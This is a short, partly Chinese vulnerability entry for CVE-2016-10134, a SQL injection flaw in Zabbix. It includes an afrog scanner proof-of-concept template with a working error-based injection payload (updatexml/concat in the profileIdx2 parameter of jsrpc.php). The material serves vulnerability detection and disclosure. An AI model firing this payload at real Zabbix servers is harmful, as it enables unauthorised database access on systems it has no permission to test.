CVE-2016-10134: Zabbix SQL Injection Vulnerability

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.

PoC代码[已公开]

id: CVE-2016-10134

info:
  name: Zabbix SQL Injection Vulnerability
  author: sharecast
  severity: critical
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10134
  description: |-
    SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.
  tags: cve,cve2016,zabbix,rce
  created: 2023/07/13

set:
  r: randomInt(2000000000, 2100000000)
rules:
  r0:
    request:
      method: GET
      path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0)
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31)))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2016/CVE-2016-10134.yaml